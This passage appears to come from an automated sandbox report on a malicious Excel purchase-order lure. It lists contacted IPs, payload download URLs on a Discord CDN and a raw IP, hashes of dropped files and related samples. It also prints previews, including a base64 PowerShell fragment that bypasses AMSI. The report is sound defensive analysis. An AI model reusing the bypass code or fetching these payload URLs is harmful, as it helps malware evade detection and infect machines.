                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        162.159.130.233
                                                                                                                                                        		cdn.discordapp.comUnited States
                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                        172.245.119.43
                                                                                                                                                        		unknownUnited States
                                                                                                                                                        		36352AS-COLOCROSSINGUStrue

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                        Analysis ID:452643
                                                                                                                                                        Start date:22.07.2021
                                                                                                                                                        Start time:17:16:57
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 11m 44s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:PO20210722.xlsx
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                                                        Number of new started drivers analysed:2
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSX@12/15@4/2
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 18.2% (good quality ratio 16.5%)
                                                                                                                                                        • Quality average: 67.3%
                                                                                                                                                        • Quality standard deviation: 31.4%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 96%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xlsx
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        17:18:07API Interceptor36x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                        17:18:10API Interceptor333x Sleep call for process: powershell.exe modified
                                                                                                                                                        17:18:38API Interceptor98x Sleep call for process: calc.exe modified
                                                                                                                                                        17:19:06API Interceptor217x Sleep call for process: NAPSTAT.EXE modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        162.159.130.233order-confirmation.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                                                                                                                        Order Confirmation.docGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                                                                                                                        cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                                                                                                                                        SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                                                                                                                        P20200107.DOCGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                                                                                                                        FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                                                                                                                                        SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                                                                                                                        SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                                                                                                                        G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                                                                                                                        Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                                                                                                                        2021 RFQ Products Required.docGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                                                                                                                                        Company Reference1.docGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                                                                                                                                        PAY SLIP.docGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                                                                                                        SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                                                                                                                        part1.rtfGet hashmaliciousBrowse
                                                                                                                                                        • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        cdn.discordapp.comRIi1iCfuVK.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.134.233
                                                                                                                                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.134.233
                                                                                                                                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.129.233
                                                                                                                                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.134.233
                                                                                                                                                        Swift_Fattura_0093320128_.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        ySZpdJfqMO.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.129.233
                                                                                                                                                        6BeKYZk7bg.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.135.233
                                                                                                                                                        Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.134.233
                                                                                                                                                        Invoice 41319 from AGUA.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        BoFA Remittance Advice-2021207.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        WmI15xdQH8.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.135.233
                                                                                                                                                        lpaBPnb1OB.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.133.233
                                                                                                                                                        Hsbc Scan copy 3547856788 Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Statement.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.135.233
                                                                                                                                                        PO20210719.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.135.233
                                                                                                                                                        Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.134.233
                                                                                                                                                        Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.133.233
                                                                                                                                                        Doc_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.133.233
                                                                                                                                                        google.comORD.pptGet hashmaliciousBrowse
                                                                                                                                                        • 172.217.168.9
                                                                                                                                                        ORD.pptGet hashmaliciousBrowse
                                                                                                                                                        • 172.217.168.9
                                                                                                                                                        rrnIEffG4c.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.217.168.36
                                                                                                                                                        Requesting Prices.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.217.168.36

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        CLOUDFLARENETUSNew order 11244332.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Z0hOr2pD7k.exeGet hashmaliciousBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        USD_SLIP.docxGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.19.245
                                                                                                                                                        DHL JULY STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.19.200
                                                                                                                                                        qK3005mdZn.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.168.51
                                                                                                                                                        whesilox.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Bank contract,PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Scan003000494 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Swift-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.13.164
                                                                                                                                                        Order _ 08201450.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        aLLEK0YD2O.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.13.164
                                                                                                                                                        Statement SKBMT 09818.jarGet hashmaliciousBrowse
                                                                                                                                                        • 66.235.200.145
                                                                                                                                                        DOC98374933_JULY2021.EXEGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.203.175
                                                                                                                                                        Specifications_Details_20337_FLQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        RFQ - 4 SCH 160 EQUAL TEE.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.169.145
                                                                                                                                                        RIi1iCfuVK.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.51.99
                                                                                                                                                        kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.51.99
                                                                                                                                                        kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.25.234.53
                                                                                                                                                        Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.25.233.53
                                                                                                                                                        SgjcpodWpB.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.14.85
                                                                                                                                                        AS-COLOCROSSINGUSUSD_SLIP.docxGet hashmaliciousBrowse
                                                                                                                                                        • 198.46.132.159
                                                                                                                                                        o3ZUDIEL1vGet hashmaliciousBrowse
                                                                                                                                                        • 107.173.85.99
                                                                                                                                                        Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.81.125
                                                                                                                                                        BANKINV19072021LIMCA.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 192.227.129.35
                                                                                                                                                        aJw19xLGjcGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        uqZ7bBFvVLGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        9J7OaHH7ObGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        QbdydvqPuuGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        sphost.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.245.186.101
                                                                                                                                                        _VM_1064855583.HtMGet hashmaliciousBrowse
                                                                                                                                                        • 75.127.11.55
                                                                                                                                                        Inv-04_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                        • 192.227.128.168
                                                                                                                                                        Dvf7OP92yJGet hashmaliciousBrowse
                                                                                                                                                        • 104.170.143.71
                                                                                                                                                        PURCHASE ORDER 72021.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.81.125
                                                                                                                                                        Order Request for Quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.91.134
                                                                                                                                                        Quotaton.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.81.125
                                                                                                                                                        SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 192.210.173.40
                                                                                                                                                        PI.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.23.207.48
                                                                                                                                                        ftpp.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.46.132.159
                                                                                                                                                        swift.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.23.207.48
                                                                                                                                                        Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 192.210.173.40

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        7dcce5b76c8b17472d024758970a406bUSD_SLIP.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        ORD.pptGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        11.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        New order (DDV21-0014) TOKYO HIP.pptGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Statement.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        PO20210719.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Invoice-Scancopy.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        New Purchase Order-030220.pptGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        ly1.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        DHL_119040 Beleg.pptGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Machine Service.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        ABS 1234 PO.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        lokibot.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        RevisedSpreadsheet.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        RFQ-21213.docxGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Shipping Documents.docGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Drawing for Our New Order.pptGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        DHL SHIPMENT NOTIFICATION,76207428452.docGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.23572.rtfGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        Preview Orders.docGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        C:\Users\Public\vbc.exePO20210719.docxGet hashmaliciousBrowse
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exePO20210719.docxGet hashmaliciousBrowse

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\oad[1].jpg
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2026850
                                                                                                                                                            Entropy (8bit):4.762681838766658
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:BgrUL/QryYqJOkK82HIUHvDcZIyy/hBc2T1odg+GfVwZQIzbiVgFvC4nPuoHMcnS:i
                                                                                                                                                            MD5:7E40951D41A43B25F38C6DD25DC4BFE3
                                                                                                                                                            SHA1:D389E4ED359D16981FF0E05739AC4C4A96311C60
                                                                                                                                                            SHA-256:64A73E000DC919BC362CEA33F87549DA0D847C16F826E62138BF269006EF8C1C
                                                                                                                                                            SHA-512:17782CE108E5B7443D69CF024E497D33A3D9A2A39E155A34E3BD59832F447C31EF4DD75E2FAF1B381F38691CCF9E11FB6D579896D999E5097BE1700A5AA17E01
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            IE Cache URL:https://cdn.discordapp.com/attachments/858793322087710753/863891857608015902/oad.jpg
                                                                                                                                                            Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykKJGggPSAiNDQ1NjYyNTIyMDU3NTI2MzE3NDQ1MjU1NDg0NyIKJHMgPSBbc3RyaW5nXSgwLi4xM3wle1tjaGFyXVtpbnRdKDUzKygkaCkuc3Vic3RyaW5nKCgkXyoyKSwyKSl9KS1yZXBsYWNlICIgIgokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykKJGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOyAkYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7CldyaXRlLUhvc3QgIisrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):26624
                                                                                                                                                            Entropy (8bit):6.055482508518817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
                                                                                                                                                            MD5:F5041EC4CE468A07ECBFD076BC0F879B
                                                                                                                                                            SHA1:BDA8CEA1EC8D1CEA253FC661559CD84CEE2195B9
                                                                                                                                                            SHA-256:CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
                                                                                                                                                            SHA-512:4E64A727DA994675AA7517F260D639691F6A94BC9C510DDDE9D54F2F6E7F005B8B799EEEA1D9AAD1DC5128290654FA884A4AA0E397F96444914A067B8BD15C88
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Virustotal, Detection: 46%, Browse
                                                                                                                                                            • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: PO20210719.docx, Detection: malicious, Browse
                                                                                                                                                            Reputation:low
                                                                                                                                                            IE Cache URL:http://172.245.119.43/d/obi.exe
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... .............................................................P...p............................................P..(....................................................text...(...........................`.P`.data........0......."..............@.P..rdata..0....@.......$..............@.`@.pdata..p....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..idata...............@..............@.0..CRT....h............H..............@.@..tls.................J..............@.@..vmp0................L..............`..h.cobf................\..........................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D9484A8.png
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94963
                                                                                                                                                            Entropy (8bit):7.9700481154985985
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                            MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                            SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                            SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                            SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\644833DE.jpeg
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):62140
                                                                                                                                                            Entropy (8bit):7.529847875703774
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                            MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                            SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                            SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                            SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70F76B9C.png
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94963
                                                                                                                                                            Entropy (8bit):7.9700481154985985
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                            MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                            SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                            SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                            SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D899CB.emf
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):648132
                                                                                                                                                            Entropy (8bit):2.8123868765428575
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:C34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:M4UcLe0JOcXuunhqcS
                                                                                                                                                            MD5:B1201D35B95678AB9D8E1782E6C71E6C
                                                                                                                                                            SHA1:967D7CF6F5294A6E99E4EE780ED02CAA2293D2A6
                                                                                                                                                            SHA-256:4DC5CBF55010B223DC5E2E19962DFFAD82AF9B994398687B979D5CB9CADF82A4
                                                                                                                                                            SHA-512:EFCD4C5BFEC436BF4E6DAB1B21FC41A0A4C1AEF69C481D3A69C9D2AE74ABBE857E0DBBFEEF20EA0A782EE63279B14D1CAEC30AF373A6C18435F59C147B9219B4
                                                                                                                                                            Malicious:false
